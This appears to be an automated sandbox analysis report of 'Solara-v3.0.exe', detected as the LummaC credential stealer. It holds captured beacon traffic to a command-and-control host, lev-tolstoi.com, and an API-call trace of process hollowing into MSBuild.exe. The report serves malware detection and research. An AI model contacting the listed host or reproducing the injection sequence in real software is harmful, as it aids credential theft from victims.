                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1832&min_rtt=1825&rtt_var=700&sent=293&recv=586&lost=0&retrans=0&sent_bytes=2834&recv_bytes=568217&delivery_rate=1546610&cwnd=195&unsent_bytes=0&cid=77806b9a5bb99de9&ts=2439&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.5 | 49727 | 104.21.66.86 | 443 | 5668 | C:\Users\user\Desktop\Solara-v3.0.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-28 01:55:20 UTC | 263 | OUT | POST /api HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Content-Length: 86
                                                                                                                                                                                                                                            Host: lev-tolstoi.com
2024-12-28 01:55:20 UTC | 86 | OUT | Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 79 61 75 36 4e 61 2d 2d 38 39 39 30 38 33 34 34 30 26 6a 3d 26 68 77 69 64 3d 45 33 38 30 33 30 41 36 43 42 41 31 33 37 31 37 42 43 46 44 36 38 42 37 37 34 45 46 39 42 37 41
                                                                                                                                                                                                                                            Data Ascii: act=get_message&ver=4.0&lid=yau6Na--899083440&j=&hwid=E38030A6CBA13717BCFD68B774EF9B7A
2024-12-28 01:55:21 UTC | 1121 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Sat, 28 Dec 2024 01:55:21 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=evgmqmq411d2vqvk60lf4os8mg; expires=Tue, 22 Apr 2025 19:42:00 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DDRKmBDeOmomHAIlWcwlD6ACcQAxCDECy3ep3jnu4cMvLuBLaXASknuTOaRWG2WndPpwRWbozTZzfVEKav9FIpdZgtDyT0LbVQrk42hFqkk%2ByaNL%2FQTFqlA8XgUe9cQbXUM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8f8ded771c587d02-EWR
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1833&min_rtt=1829&rtt_var=695&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=985&delivery_rate=1564844&cwnd=230&unsent_bytes=0&cid=d2f787f69617e885&ts=813&x=0"


                                                                                                                                                                                                                                            Target ID:0
                                                                                                                                                                                                                                            Start time:20:54:54
                                                                                                                                                                                                                                            Start date:27/12/2024
                                                                                                                                                                                                                                            Path:C:\Users\user\Desktop\Solara-v3.0.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                            Commandline:"C:\Users\user\Desktop\Solara-v3.0.exe"
                                                                                                                                                                                                                                            Imagebase:0xc90000
                                                                                                                                                                                                                                            File size:567'848 bytes
                                                                                                                                                                                                                                            MD5 hash:AC461B5D5AC030C7CC5C2F48EFC44668
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                                            • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.2033508060.0000000005059000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:1
                                                                                                                                                                                                                                            Start time:20:54:54
                                                                                                                                                                                                                                            Start date:27/12/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                            Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:3
                                                                                                                                                                                                                                            Start time:20:54:55
                                                                                                                                                                                                                                            Start date:27/12/2024
                                                                                                                                                                                                                                            Path:C:\Users\user\Desktop\Solara-v3.0.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:"C:\Users\user\Desktop\Solara-v3.0.exe"
                                                                                                                                                                                                                                            Imagebase:0xc90000
                                                                                                                                                                                                                                            File size:567'848 bytes
                                                                                                                                                                                                                                            MD5 hash:AC461B5D5AC030C7CC5C2F48EFC44668
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:4
                                                                                                                                                                                                                                            Start time:20:54:55
                                                                                                                                                                                                                                            Start date:27/12/2024
                                                                                                                                                                                                                                            Path:C:\Users\user\Desktop\Solara-v3.0.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                            Commandline:"C:\Users\user\Desktop\Solara-v3.0.exe"
                                                                                                                                                                                                                                            Imagebase:0xc90000
                                                                                                                                                                                                                                            File size:567'848 bytes
                                                                                                                                                                                                                                            MD5 hash:AC461B5D5AC030C7CC5C2F48EFC44668
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000003.2215880335.0000000003332000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000003.2193726868.000000000336E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000003.2193850105.000000000331F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000003.2193758527.000000000331F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000003.2215763251.0000000003332000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000003.2193931805.0000000003331000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                                                              Execution Coverage:6.5%
                                                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:1.1%
                                                                                                                                                                                                                                              Signature Coverage:3.7%
                                                                                                                                                                                                                                              Total number of Nodes:849
                                                                                                                                                                                                                                              Total number of Limit Nodes:22
API calls _Fputc 20766->20803 20767->20768 20769 caf704 _Fputc 29 API calls 20767->20769 20768->20766 20770 caf704 _Fputc 29 API calls 20768->20770 20772 ca8e22 20769->20772 20773 ca8e60 20770->20773 20774 caf704 _Fputc 29 API calls 20772->20774 20775 ca8e83 20773->20775 20777 caf704 _Fputc 29 API calls 20773->20777 20774->20768 20775->20766 20776 ca8e9b 20775->20776 20787 caf430 20776->20787 20779 ca8e6c 20777->20779 20779->20775 20781 caf704 _Fputc 29 API calls 20779->20781 20780 ca8ead 20780->20761 20797 ca8c30 20780->20797 20782 ca8e78 20781->20782 20783 caf704 _Fputc 29 API calls 20782->20783 20783->20775 20785->20750 20786->20750 20788 caf445 20787->20788 20789 caf486 20788->20789 20795 caf449 __fread_nolock _Fputc 20788->20795 20796 caf472 __fread_nolock 20788->20796 20804 ca3790 39 API calls _Fputc 20788->20804 20789->20795 20789->20796 20805 cac021 WideCharToMultiByte _Fputc 20789->20805 20793 caf541 20794 caf557 GetLastError 20793->20794 20793->20795 20794->20795 20794->20796 20795->20780 20796->20795 20806 ca7f78 29 API calls 2 library calls 20796->20806 20798 ca8c3e 20797->20798 20799 ca8c4f 20797->20799 20807 cb4a37 20798->20807 20799->20780 20801 ca8c4a 20801->20780 20802->20761 20803->20761 20804->20789 20805->20793 20806->20795 20808 cb4ad2 20807->20808 20809 caf704 _Fputc 29 API calls 20808->20809 20811 cb4adf 20809->20811 20810 cb4aeb 20810->20801 20811->20810 20812 cb4b37 20811->20812 20831 cb4a4d 31 API calls __fread_nolock 20811->20831 20812->20810 20814 cb4b99 20812->20814 20815 cae736 _Fputc 29 API calls 20812->20815 20820 cb4cc2 20814->20820 20817 cb4b8c 20815->20817 20817->20814 20832 cb669f 14 API calls 2 library calls 20817->20832 20821 caf704 _Fputc 29 API calls 20820->20821 20822 cb4cd1 20821->20822 20823 cb4d77 20822->20823 20824 cb4ce4 20822->20824 20825 cb3e10 _Fputc 64 API calls 20823->20825 20826 cb4d01 20824->20826 20829 cb4d28 20824->20829 20828 cb4baa 20825->20828 20827 cb3e10 _Fputc 64 API calls 20826->20827 20827->20828 
20828->20801 20829->20828 20833 cb2922 33 API calls _Fputc 20829->20833 20831->20812 20832->20814 20833->20828 20835 ca951c 20834->20835 20840 ca9544 20834->20840 20836 ca954b 20835->20836 20837 ca9529 20835->20837 20835->20840 20842 ca95d1 20836->20842 20850 ca7f78 29 API calls 2 library calls 20837->20850 20840->20739 20843 ca95dd ___scrt_is_nonwritable_in_current_image 20842->20843 20851 ca3315 EnterCriticalSection 20843->20851 20845 ca95eb 20852 ca9585 20845->20852 20849 ca9583 20849->20739 20850->20840 20851->20845 20853 cae68b 30 API calls 20852->20853 20854 ca959d 20853->20854 20860 ca9367 20854->20860 20857 cae774 64 API calls 20858 ca95c7 20857->20858 20859 ca9620 LeaveCriticalSection _Ungetc 20858->20859 20859->20849 20861 ca93a2 20860->20861 20863 ca9379 20860->20863 20861->20857 20862 ca9387 20870 ca7f78 29 API calls 2 library calls 20862->20870 20863->20861 20863->20862 20865 ca93bd _Yarn 20863->20865 20865->20861 20866 cb4a37 _Fputc 66 API calls 20865->20866 20867 ca85b8 ___scrt_uninitialize_crt 64 API calls 20865->20867 20868 caf704 _Fputc 29 API calls 20865->20868 20869 cb3e10 _Fputc 64 API calls 20865->20869 20866->20865 20867->20865 20868->20865 20869->20865 20870->20861 20871->20705 20872->20703 20873->20703 20874->20703 20876 c94b4f 20875->20876 20878 c92c50 39 API calls 20876->20878 20879 c94b6f 20876->20879 20878->20879 20881 c94c3e 20879->20881 20886 c92f00 38 API calls std::ios_base::_Init 20879->20886 20887 c932c0 30 API calls 5 library calls 20879->20887 20888 ca060c RaiseException 20879->20888 20882 c91de4 20881->20882 20885 c938e0 39 API calls 2 library calls 20881->20885 20882->20480 20885->20882 20886->20879 20887->20879 20888->20879 20889 c998f0 20890 c998f9 20889->20890 20891 c9990f 20889->20891 20896 c92270 GetModuleHandleA GetModuleFileNameW 20890->20896 20903 c9b57d RaiseException Concurrency::cancel_current_task CallUnexpected 20891->20903 20904 caa89a 20896->20904 20898 c922b0 20908 c91fb0 GetPEB 20898->20908 20901 c9a6e1 
__ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 20902 c922ca 20901->20902 20905 caa8ad _Fputc 20904->20905 20931 caa90f 20905->20931 20907 caa8bf _Fputc 20907->20898 20962 c91240 20908->20962 20912 c92225 20912->20901 20913 c92041 GetFileSize 20914 c921fc CloseHandle 20913->20914 20915 c92055 20913->20915 20914->20912 20916 c9205d ReadFile 20915->20916 20917 c92079 CloseHandle 20916->20917 20918 c921f3 20916->20918 20919 c92205 20917->20919 20930 c92090 _Yarn _Deallocate _strlen 20917->20930 20918->20914 20974 c91ef0 20919->20974 20921 c9223b 20993 c92600 30 API calls std::_Throw_Cpp_error 20921->20993 20923 c92247 20994 ca7ddf 29 API calls 2 library calls 20923->20994 20925 c9a663 RaiseException EnterCriticalSection LeaveCriticalSection std::ios_base::_Init 20925->20930 20930->20919 20930->20921 20930->20923 20930->20925 20987 c91000 20930->20987 20932 caa93f 20931->20932 20933 caa94e 20932->20933 20935 caa96c 20932->20935 20952 caa943 20932->20952 20955 ca7f78 29 API calls 2 library calls 20933->20955 20944 caa979 20935->20944 20956 ca3790 39 API calls _Fputc 20935->20956 20936 c9a6e1 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 20943 caabb4 20936->20943 20938 caa993 20957 cb66fb 5 API calls 3 library calls 20938->20957 20939 caa9b1 20941 caab41 20939->20941 20942 caa9c5 20939->20942 20941->20952 20961 cac021 WideCharToMultiByte _Fputc 20941->20961 20946 caaa5f 20942->20946 20950 caaa09 20942->20950 20942->20952 20943->20907 20944->20938 20944->20939 20959 cac021 WideCharToMultiByte _Fputc 20946->20959 20949 caaa72 20951 caaa8b GetLastError 20949->20951 20949->20952 20958 cac021 WideCharToMultiByte _Fputc 20950->20958 20951->20952 20954 caaa9a 20951->20954 20952->20936 20954->20952 20960 cac021 WideCharToMultiByte _Fputc 20954->20960 20955->20952 20956->20944 20957->20952 20958->20952 20959->20949 
20960->20954 20961->20952 20963 c91283 _Yarn _Deallocate _strlen 20962->20963 20973 c91402 CreateFileA 20962->20973 20964 c91422 20963->20964 20966 c9142e 20963->20966 20967 c9a663 RaiseException EnterCriticalSection LeaveCriticalSection std::ios_base::_Init 20963->20967 20971 c91000 102 API calls 20963->20971 20963->20973 20995 c92600 30 API calls std::_Throw_Cpp_error 20964->20995 20996 ca7ddf 29 API calls 2 library calls 20966->20996 20967->20963 20971->20963 20973->20912 20973->20913 20975 c91240 102 API calls 20974->20975 20976 c91f18 FreeConsole 20975->20976 20997 c914b0 20976->20997 20978 c91f39 20979 c914b0 103 API calls 20978->20979 20980 c91f4a 20979->20980 20981 c91240 102 API calls 20980->20981 20982 c91f5d VirtualProtect 20981->20982 20984 c91f7e 20982->20984 20985 c9a6e1 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 20984->20985 20986 c91fa3 20985->20986 20986->20912 20988 c91013 20987->20988 21008 c92750 20988->21008 21001 c914f0 20997->21001 20998 c94320 30 API calls 20998->21001 20999 c91750 103 API calls 20999->21001 21000 c91d10 75 API calls 21000->21001 21001->20998 21001->20999 21001->21000 21002 c916dd 21001->21002 21003 c91702 _Deallocate 21001->21003 21002->21003 21007 ca7ddf 29 API calls 2 library calls 21002->21007 21003->20978 21009 c927ae 21008->21009 21010 c92c50 39 API calls 21009->21010 21012 c927fa 21009->21012 21018 c927d1 21009->21018 21010->21012 21012->21018 21028 c9cfb0 21012->21028 21013 c929de 21014 c91028 21013->21014 21032 c938e0 39 API calls 2 library calls 21013->21032 21020 c91110 21014->21020 21018->21013 21033 c92f00 38 API calls std::ios_base::_Init 21018->21033 21034 c932c0 30 API calls 5 library calls 21018->21034 21035 ca060c RaiseException 21018->21035 21021 c9115c 21020->21021 21036 c93c70 21021->21036 21025 c92c50 39 API calls 21026 c91031 21025->21026 21026->20930 21029 c9cfbf 21028->21029 21030 c9cfd2 _Yarn 21028->21030 
21029->21018 21030->21029 21031 ca932d 69 API calls 21030->21031 21031->21029 21032->21014 21033->21018 21034->21018 21035->21018 21037 c9a9f4 std::_Lockit::_Lockit 7 API calls 21036->21037 21038 c93caa 21037->21038 21039 c9a9f4 std::_Lockit::_Lockit 7 API calls 21038->21039 21041 c93ce5 21038->21041 21040 c93cc4 21039->21040 21043 c9aa25 std::_Lockit::~_Lockit 2 API calls 21040->21043 21044 c9a663 std::ios_base::_Init 3 API calls 21041->21044 21054 c93daf 21041->21054 21042 c9aa25 std::_Lockit::~_Lockit 2 API calls 21045 c91170 21042->21045 21043->21041 21046 c93d4a 21044->21046 21055 c93a00 21045->21055 21069 c93e90 67 API calls 4 library calls 21046->21069 21048 c93d7c 21070 c9ecbf 39 API calls __Getctype 21048->21070 21050 c93d97 21071 c94010 65 API calls 3 library calls 21050->21071 21052 c93da2 21072 c9ab43 RaiseException _Yarn Concurrency::cancel_current_task 21052->21072 21054->21042 21056 c93a3f 21055->21056 21058 c92c50 39 API calls 21056->21058 21059 c93a85 21056->21059 21060 c93a5f 21056->21060 21058->21059 21059->21060 21073 c9cb40 21059->21073 21082 c9cb32 21059->21082 21095 c9cb22 21059->21095 21062 c93b2d 21060->21062 21107 c92f00 38 API calls std::ios_base::_Init 21060->21107 21108 c932c0 30 API calls 5 library calls 21060->21108 21109 ca060c RaiseException 21060->21109 21063 c911e4 21062->21063 21106 c938e0 39 API calls 2 library calls 21062->21106 21063->21025 21069->21048 21070->21050 21071->21052 21072->21054 21077 c9cb63 21073->21077 21078 c9cb5c 21073->21078 21074 c9a6e1 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 21075 c9cc48 21074->21075 21075->21060 21077->21078 21079 c9cc09 21077->21079 21080 c9cba9 21077->21080 21078->21074 21079->21078 21081 ca932d 69 API calls 21079->21081 21080->21078 21110 c9c44d 21080->21110 21081->21078 21083 c9cb39 21082->21083 21087 c9cb85 21082->21087 21137 ca3329 LeaveCriticalSection 21083->21137 21084 c9cb10 21084->21060 21086 
c9cb3e 21086->21060 21087->21060 21087->21084 21088 c9cc09 21087->21088 21089 c9cbea 21087->21089 21090 c9cbfb 21088->21090 21091 ca932d 69 API calls 21088->21091 21089->21090 21093 c9c44d _Fputc 68 API calls 21089->21093 21092 c9a6e1 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 21090->21092 21091->21090 21094 c9cc48 21092->21094 21093->21090 21094->21060 21096 c9cb29 21095->21096 21102 c9cb2e 21095->21102 21138 ca3315 EnterCriticalSection 21096->21138 21098 c9cb79 21099 c9a6e1 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 21098->21099 21100 c9cc48 21099->21100 21100->21060 21101 c9c44d _Fputc 68 API calls 21101->21098 21102->21060 21102->21098 21103 c9cc09 21102->21103 21104 c9cba9 21102->21104 21103->21098 21105 ca932d 69 API calls 21103->21105 21104->21098 21104->21101 21105->21098 21106->21063 21107->21060 21108->21060 21109->21060 21113 ca8bfc 21110->21113 21112 c9c45d 21112->21078 21114 ca8c0f _Fputc 21113->21114 21117 ca8c5d 21114->21117 21116 ca8c1e _Fputc 21116->21112 21118 ca8c69 ___scrt_is_nonwritable_in_current_image 21117->21118 21119 ca8c72 21118->21119 21120 ca8c96 21118->21120 21134 ca7f78 29 API calls 2 library calls 21119->21134 21133 ca3315 EnterCriticalSection 21120->21133 21123 ca8c8b _Fputc 21123->21116 21124 ca8c9f 21125 caf704 _Fputc 29 API calls 21124->21125 21132 ca8cb4 21124->21132 21125->21132 21126 ca8d20 21135 ca7f78 29 API calls 2 library calls 21126->21135 21127 ca8d51 21128 ca8c30 _Fputc 66 API calls 21127->21128 21130 ca8d5d 21128->21130 21136 ca8d89 LeaveCriticalSection _Ungetc 21130->21136 21132->21126 21132->21127 21133->21124 21134->21123 21135->21123 21136->21123 21137->21086 21138->21102 21139 c9b060 21162 c9afc4 GetModuleHandleExW 21139->21162 21142 c9b0a6 21144 c9afc4 Concurrency::details::_Reschedule_chore GetModuleHandleExW 21142->21144 21146 c9b0ac 
21144->21146 21145 c9b09a 21171 c9efd2 21145->21171 21148 c9b0cd 21146->21148 21174 c9afa7 GetModuleHandleExW 21146->21174 21164 c97770 21148->21164 21150 c9b0bd 21150->21148 21151 c9b0c3 FreeLibraryWhenCallbackReturns 21150->21151 21151->21148 21152 c9b0dd 21153 c9afc4 Concurrency::details::_Reschedule_chore GetModuleHandleExW 21152->21153 21154 c9b0e3 21153->21154 21160 c9b111 21154->21160 21175 c9aefa 37 API calls std::_Throw_Cpp_error 21154->21175 21156 c9b0ef 21157 c9efd2 ReleaseSRWLockExclusive 21156->21157 21158 c9b102 21157->21158 21158->21160 21176 c9e95d WakeAllConditionVariable 21158->21176 21163 c9afda 21162->21163 21163->21142 21170 c9aefa 37 API calls std::_Throw_Cpp_error 21163->21170 21165 c977af 21164->21165 21177 c98aa0 21165->21177 21166 c977b9 21182 c9af64 CloseThreadpoolWork 21166->21182 21168 c977cb 21168->21152 21170->21145 21172 c9efed 21171->21172 21173 c9efdf ReleaseSRWLockExclusive 21171->21173 21172->21142 21173->21172 21174->21150 21175->21156 21176->21160 21178 c98add 21177->21178 21179 c98ae8 21178->21179 21183 c990e0 21178->21183 21200 c990f0 21178->21200 21179->21166 21182->21168 21184 c990ea 21183->21184 21216 c9efc1 21184->21216 21187 c991c7 21226 c9b317 30 API calls 2 library calls 21187->21226 21188 c99136 21189 c991ce 21188->21189 21190 c99143 21188->21190 21227 c9b317 30 API calls 2 library calls 21189->21227 21192 c9914b 21190->21192 21193 c99174 21190->21193 21196 c9efd2 ReleaseSRWLockExclusive 21192->21196 21195 c9efd2 ReleaseSRWLockExclusive 21193->21195 21197 c99181 21195->21197 21198 c99151 std::_Throw_Cpp_error 21196->21198 21219 c992f0 21197->21219 21198->21179 21201 c9efc1 12 API calls 21200->21201 21202 c9912b 21201->21202 21203 c991c7 21202->21203 21204 c99136 21202->21204 21255 c9b317 30 API calls 2 library calls 21203->21255 21205 c991ce 21204->21205 21206 c99143 21204->21206 21256 c9b317 30 API calls 2 library calls 21205->21256 21208 c9914b 21206->21208 21209 c99174 21206->21209 21212 c9efd2 
ReleaseSRWLockExclusive 21208->21212 21211 c9efd2 ReleaseSRWLockExclusive 21209->21211 21213 c99181 21211->21213 21214 c99151 std::_Throw_Cpp_error 21212->21214 21215 c992f0 66 API calls 21213->21215 21214->21179 21215->21214 21228 c9eff1 GetCurrentThreadId 21216->21228 21244 c99620 21219->21244 21223 c9939f 21253 c99400 66 API calls std::_Throw_Cpp_error 21223->21253 21225 c993ae 21225->21198 21229 c9f01b 21228->21229 21230 c9f03a 21228->21230 21231 c9f020 AcquireSRWLockExclusive 21229->21231 21239 c9f030 21229->21239 21232 c9f05a 21230->21232 21233 c9f043 21230->21233 21231->21239 21235 c9f0b9 21232->21235 21241 c9f072 21232->21241 21234 c9f04e AcquireSRWLockExclusive 21233->21234 21233->21239 21234->21239 21236 c9f0c0 TryAcquireSRWLockExclusive 21235->21236 21235->21239 21236->21239 21237 c9a6e1 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 21238 c9912b 21237->21238 21238->21187 21238->21188 21239->21237 21241->21239 21242 c9f0a9 TryAcquireSRWLockExclusive 21241->21242 21243 c9fdcd GetSystemTimePreciseAsFileTime GetSystemTimeAsFileTime __aulldiv __aullrem __Xtime_get_ticks 21241->21243 21242->21239 21242->21241 21243->21241 21245 c99667 21244->21245 21246 c9a663 std::ios_base::_Init 3 API calls 21245->21246 21247 c9935f 21246->21247 21248 c994f0 21247->21248 21249 c99536 std::_Throw_Cpp_error 21248->21249 21252 c99540 std::_Throw_Cpp_error 21249->21252 21254 c9b57d RaiseException Concurrency::cancel_current_task CallUnexpected 21249->21254 21252->21223 21253->21225 21257 ca92d7 21258 cabed7 ___free_lconv_mon 14 API calls 21257->21258 21259 ca92ef 21258->21259

Control-flow Graph

APIs
• CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00CCA110,00CCA100), ref: 00CCA334
• VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 00CCA347
• Wow64GetThreadContext.KERNEL32(0000011C,00000000), ref: 00CCA365
• ReadProcessMemory.KERNELBASE(0000009C,?,00CCA154,00000004,00000000), ref: 00CCA389
• VirtualAllocEx.KERNELBASE(0000009C,?,?,00003000,00000040), ref: 00CCA3B4
• TerminateProcess.KERNELBASE(0000009C,00000000), ref: 00CCA3D3
• WriteProcessMemory.KERNELBASE(0000009C,00000000,?,?,00000000,?), ref: 00CCA40C
• WriteProcessMemory.KERNELBASE(0000009C,00400000,?,?,00000000,?,00000028), ref: 00CCA457
• WriteProcessMemory.KERNELBASE(0000009C,?,?,00000004,00000000), ref: 00CCA495
• Wow64SetThreadContext.KERNEL32(0000011C,04F30000), ref: 00CCA4D1
• ResumeThread.KERNELBASE(0000011C), ref: 00CCA4E0
Strings
Memory Dump Source
• Source File: 00000000.00000002.2033085518.0000000000CCA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.2033030136.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033068489.0000000000CBD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033099686.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033120728.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033137824.0000000000CD2000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033168531.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_Solara-v3.jbxd
Similarity
• API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResumeTerminate
• String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$CreateProcessW$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
• API String ID: 2440066154-3857624555
• Opcode ID: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
• Instruction ID: 2517bcaad138f5626ff6b2e1a3613d2b94862d4e6f8cedcdb9679be5979ea805
• Opcode Fuzzy Hash: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
• Instruction Fuzzy Hash: D8B1F87660064AAFDB60CF68CC80BDA73A5FF88714F158158EA1CAB341D774FA51CB94

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00C91240: _strlen.LIBCMT ref: 00C912BA
                                                                                                                                                                                                                                              • CreateFileA.KERNELBASE ref: 00C92036
                                                                                                                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000), ref: 00C92046
                                                                                                                                                                                                                                              • ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000), ref: 00C9206B
                                                                                                                                                                                                                                              • CloseHandle.KERNELBASE(00000000), ref: 00C9207A
                                                                                                                                                                                                                                              • _strlen.LIBCMT ref: 00C920CD
                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00C921FD
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.2033030136.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033068489.0000000000CBD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033085518.0000000000CCA000.00000040.00000001.01000000.00000003.sdmp
